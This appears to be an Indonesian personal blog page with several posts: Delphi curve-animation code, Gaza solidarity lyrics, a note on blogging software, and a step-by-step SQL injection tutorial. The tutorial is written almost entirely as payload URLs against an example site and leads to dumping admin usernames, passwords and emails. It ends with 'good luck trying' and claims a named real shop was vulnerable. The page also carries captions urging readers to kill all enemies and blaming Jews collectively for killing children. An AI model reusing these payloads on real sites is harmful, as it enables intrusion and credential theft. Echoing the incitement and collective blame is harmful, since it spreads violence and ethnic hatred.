Masjid Kubah As-Sakhra

Kita jaga Kubah As-Sakhra

Jalur Gaza

Lihat apa yang di lakukan Israel, sekan nyawa manusia tidak ada artinya

Tak berdosa

Yahudi membunuh anak - anak membabi buta, tanpa ada belas kasihan, sebenarnya apa yang di lakukan yahudi??

Zihad

Subhanallah, dia rela mati untuk tanah airnya, tunjukan semangtmu. bunuh semua musuhmua ALLAH HUAKBAR

Palestina selalu di hati

Kami tidak akan menyerah Di malam hari, tanpa perlawanan Kalian bisa membakar masjid kami, rumah kami dan sekolah kami Tapi semangat kami tidak akan pernah mati Kami tidak akan menyerah

Duka ku

sedikah anda jika orang tua anda mati karna bom?? ini lah penderitaan anak yang manis, sedihnya melupakan penderitaan

Darah surga

Inikah yang di bilang baik, anak kecil di bom

Zionis yahudi

Inikah yang di bilang baik, anak kecil di bom

ya ALLAh

Doa Anak dan Ibu di pagi hari

Maut

Allah sudah menjanjikan surga mu untuk para suhada

Yahudi

Kejamnya yahudi atas tindakan yang melanggar HAM

Bom di pagi hari

Palsetina seakan tidak tenang menjalani hari

Mendukung Israel Menang

Anda mendukung israel menang,lalu anada lupa apa yang dia lakukan di negri Palestina. dukungan mu sama saja anda membunuh 250 orang perharinya..

Senin, 16 April 2012

pengertian dan langkah - langkah SQL Injection

8:03:00 PM seppriatna No comments

Ini merupakan contoh kasus terhadap jaringan ke amanan system pada Gramadia Online

Dari hal ini saya juga tidak menyangka pada situs tersebut masih Vulan terhadap SQL Injection ketika seseorang mencoba teknik SQL Injection di login member. dan alhasil, masuk pada login yang tidak di kenali.


                                                            Contoh gambar di bawah ini
 


 Untuk dapat mengenal lebih jauh apa itu SQL Injection, anda dapat membaca artikel di bawah ini.

Pengertian SQL injection:

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.



===========
= Step Satu:  =
===========

carilah target
misalkan: http//www.snipp55.com/berita.php?id=100

Tambahkan karakter ( ‘ ) pada akhir url atau menambahkan karakter ( – ) untuk melihat apakah ada pesan error.
contoh:
http//www.snipp55.com/berita.php?id=100′ atau
http//www.snipp55.com/berita.php?id=-100
sehingga muncul pesan error seperti berikut :

” Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/html/classes/storedProcedures/GetArticleData.class.php on line 92 “

(dan masih banyak lagi pesan error yg lainnya)



==========
= Step Dua: =
==========

mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : order by

contoh:

http//www.snipp55.com/berita.php?id=-100+order+by+1–  atau
http//www.snipp55.com/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)…
misal:

http//www.snipp55.com/berita.php?id=-100+order+by+1–
http//www.snipp55.com/berita.php?id=-100+order+by+2–
http//www.snipp55.com/berita.php?id=-100+order+by+3–
http//www.snipp55.com/berita.php?id=-100+order+by+4– dst

sehingga muncul pesan error…
misal pesan errornya muncul di table 9 :

http//www.snipp55.com/berita.php?id=-100+order+by+9–

berarti table yang terdapat dalam database adalah 8
menjadi http//www.snipp55.com/berita.php?id=-100+order+by+8–



===========
= Step Tiga:   =
===========

mencari nomor keberuntungan dengan menggunakan perintah union select
karena tadi tablenya hanya ada 8
maka: http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–

ok seumpama yg keluar adalah angka 5

maka gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai, masukan perintah tsb pada angka yg keluar tadi
misal: http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–

lalu lihat versi database yg digunakan seumpama versi 4 maka tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema

jika versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema



============
= Step Empat:=
============

menampilkan table yg ada pada web tsb dengan
perintah group_concat(table_name)         >>> dimasukan pada angka keberuntungan yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()–        >>> dimasukan setelah angka terakhir

Contoh :

http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()–

ibaratkan yang muncul adalah table  “admin”



===========
= Step Lima:=
===========

menampilkan kolom yang terdapat di table “admin”

perintah group_concat(column_name)         >>> dimasukan pada angka keberuntungan yg keluar tadi
perintah +from+information_schema.columns+where+table_name=Oxhexa–       >>> dimasukan setelah angka terakhir

Contoh :

http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=Oxhexa–

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://home2.paulschou.net/tools/xlate/

contoh kata yg ingin di konversi yaitu “admin” (tanpa tanda kutip) maka akan menjadi 61646d696e

maka : http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=Ox61646D696E–

ibaratkan yang muncul adalah column username,password,email



============
= Step Enam : =
============

memunculkan apa yg tadi telah dikeluarkan dari column yaitu dengan cara

perintah concat_ws(Ox3a,hasil isi column yg akan dikeluarkan)         >>> dimasukan pada angka keberuntungan yg keluar tadi
perintah +from+(nama table berasal)          >>> dimasukan setelah angka terakhir

Contoh :

http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,concat_ws(Ox3a,column yang akan dilihat isinya),6,7,8+from+(nama table)–

contoh column yang keluar td adalah column username,password,email

Maka :

http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,concat_ws(Ox3a,username,Ox3a,password,Ox3a,email),6,7,8+from+admin–

contoh yang keluar :

admin:an4kal4y:alay_alay@alay.com

cara membaca nya seperti berikut :

username : admin

password : an4kal4y

email : alay_alay@alay.com



==============
= Step Tujuh    :   =
==============

tahap terakhir yang harus dilakukan adalah mencari halaman admin atau login (adminlogin).

website yang menyediakan program pencarian login admin :
http://revtan.site40.net/admin/?

Selamat Mencoba

“saya tidak bertanggung jawab bila ada yang menyalahgunaan informasi yang ada di blog ini”

“anda yang berbuat,anda yang menerima”     ^_^



Sumber ini di ambil dari http://revifauzi.blogspot.com dan snipp55.wordpress.com
Untuk memenuhi tugas System Keamanan Komputer
Read more »

Rabu, 14 Maret 2012

Membuat anaimasi kurva II dengan delphi 6.0

3:38:00 PM seppriatna No comments

Pada postingan yang  saya posting tadi saya akan membuat sebuah animasi Kurva Yang ke II
langkah awal buka delphi
buat sebuah form dan tambah komponen seperti gambar yang di atas

Masukan koding pada setiap komponen yang telah anda  tambahkan pada form

unit AnimasiCurpa2U;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, ExtCtrls;

type
  TForm1 = class(TForm)
    Shape1: TShape;
    Timer1: TTimer;
    Button1: TButton;
    Button2: TButton;
    procedure Button1Click(Sender: TObject);
    procedure Timer1Timer(Sender: TObject);
    procedure Button2Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;
   r,d,c,x,y,theta,thetaf:real;
   a,xc,yc,b,xp:integer;
implementation

{$R *.dfm}

procedure TForm1.Button1Click(Sender: TObject);
begin
a:=100;xc:=300;yc:=200;b:=100;
thetaf:=0.0;
d:=2*PI;xp:=0;
theta:=d;
c:=1/a; timer1.Enabled:=true;
shape1.Visible:=false;
end;

                 procedure TForm1.Timer1Timer(Sender: TObject);
                 begin
                 if (thetaf<(8*theta))then
                 begin
                 r:=b*sin(thetaf)+sin(thetaf)/cos(thetaf);
                 x:=r*cos(5*thetaf);
                 y:=r*sin(7*thetaf);
                 if xp=0 then
                 canvas.Pixels[trunc(xc+x),trunc(yc+y)]:=clred;
                 if xp=1then
                 begin
                 shape1.Left:=trunc(xc+x);
                 shape1.Top:=trunc(yc+y);
                 end;
                 thetaf:=thetaf+c;
                 end;
                 end;

procedure TForm1.Button2Click(Sender: TObject);
begin
xp:=1;
shape1.Visible:=true;
a:=100; xc:=300; yc:=200; b:=100;
thetaf:=0.0;
d:=2*PI;
theta:=d;
c:=1/a; timer1.Enabled:=true;
end;
end.

Semoga bermanfaat  jangan lupa komennya


Read more »

Posted in:

Membuat anaimasi kurva dengan delphi 6.0

3:27:00 PM seppriatna 1 comment

Pertama anda jalankan Delphi 6.0
Jadikan Form delphi seperti gambar di bawah ini
Setiap komponen tambah koding seperti di bawah ini    ::

unit AnimasiKurvaU;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, ExtCtrls;

type
  TForm1 = class(TForm)
    Shape1: TShape;
    Timer1: TTimer;
    Button1: TButton;
    Button2: TButton;
    procedure Button1Click(Sender: TObject);
    procedure Timer1Timer(Sender: TObject);
    procedure Button2Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;
 r,d,c,x,y,theta,thetaf:real;
 a,xc,yc,b,xp:integer;
implementation

{$R *.dfm}

procedure TForm1.Button1Click(Sender: TObject);
begin
a:=100;xc:=300;yc:=200;b:=100;
thetaf:=0.0;
d:=2.*PI;xp:=0;
theta:=d;
c:=1/a; timer1.Enabled:=true;
shape1.Visible:=false;
end;


              procedure TForm1.Timer1Timer(Sender: TObject);
              begin
              if (thetaf<(8*theta))then
              begin
              r:=b+sin(thetaf)/cos(thetaf);
              x:=r*cos(5*thetaf);
              y:=r*sin(7*thetaf);
              if xp=0 then
              canvas.Pixels[trunc(xc+x),trunc(yc+y)]:=clred;
              if xp=1then
              begin
              shape1.Left:=trunc(xc+x) ;
              shape1.Top:=trunc(yc+y);
              end;
              thetaf:=thetaf+c;
              end;
              if (thetaf>(8*theta))then
              begin
              r:=b+sin(thetaf)/cos(sqr(thetaf));
              x:=r*cos(thetaf);
              y:=r*sin(thetaf);
              if xp=0 then
              canvas.Pixels[trunc(xc+x),trunc(yc+y)]:=clred;
              if xp=1 then
              begin
              shape1.Left:=trunc(xc+x);
              shape1.Left:=trunc(yc+y);
              end;
              thetaf:=thetaf+c;
              end;
               end;




procedure TForm1.Button2Click(Sender: TObject);
begin
xp:=1;
shape1.Visible:=true;
a:=100; xc:=300; yc:=200; b:=100;
thetaf:=0.0;
d:=2*PI;
thetaf:=d;
c:=1/a; timer1.Enabled:=true;
end;
end.

SEMOGA BERMANFAAT
Read more »

Posted in:

Sabtu, 10 Maret 2012

LAGU UNTUK MU PALESTINA, GAZA, AL-QUDS

12:21:00 PM seppriatna No comments

A blinding flash of white light
Lit up the sky over Gaza tonight
People running for cover
Not knowing whether they’re dead or alive

They came with their tanks and their planes
With ravaging fiery flames
And nothing remains
Just a voice rising up in the smoky haze

We will not go down
In the night, without a fight
You can burn up our mosques and our homes and our schools
But our spirit will never die
We will not go down
In Gaza tonight

Women and children alike
Murdered and massacred night after night
While the so-called leaders of countries afar
Debated on who’s wrong or right

But their powerless words were in vain
And the bombs fell down like acid rain
But through the tears and the blood and the pain
You can still hear that voice through the smoky haze

We will not go down
In the night, without a fight
You can burn up our mosques and our homes and our schools
But our spirit will never die
We will not go down
In Gaza tonight


Takkan kami jual darah syuhada dan linangan air mata anak yatim Sedangkan Al-Quds berteriak karena lilitan belenggu tanpa kebaikan tanpa perdamaian
Mereka memang serigala, darah kami masih mengalir bekas tembakan mereka. Dendam kami masih berharap maka bangkitlah untuk jalan dendam itu
Putri-putri pelempar batu memberi semangat mengatasi segala tekanan penjara. Seruan meminta keselamatan tetap mengalir
Tidak kami takkan mau berdamai dan dihina. Takkan kami tunda walau luka parah, karena kami pewaris pengorbanan
Umar Ayahku dan Shalahuddin saudaraku, merekalah cahaya kemuliaan. Kami jual hidup kami untuk Al-Quds, juga jiwa raga kami
Dan fajar kemenangan pasti datang setelah berlalunya malam kekalahan. Menghancurkan para musuh dan pengkhianat

Semngat ini Untuk mu GAZA.... I Love U Palestina AL-quds
ALLAH huakbar
Read more »

Sabtu, 03 Maret 2012

know some of the famous blog software

1:42:00 AM seppriatna No comments

Today, blogging seems to have common activities undertaken by many groups. Not only young people, people - parents and many professionals are beginning to understand the benefits and begin regular with this blogging activity.
There are some software that many in the market. Not only the commercial, which gratispun not lose its quality. Here are some blogging software geratis famous:
A. Bloggspot / Blogger.
2. Blogsome.
3. Wordpress.

Please try - try to determine which blogs are most suitable for you.
Read more »

Posted in: